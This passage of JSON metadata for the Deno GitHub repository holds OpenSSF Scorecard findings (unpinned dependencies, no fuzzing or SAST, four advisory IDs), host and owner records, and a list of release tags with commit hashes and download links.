not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/reposi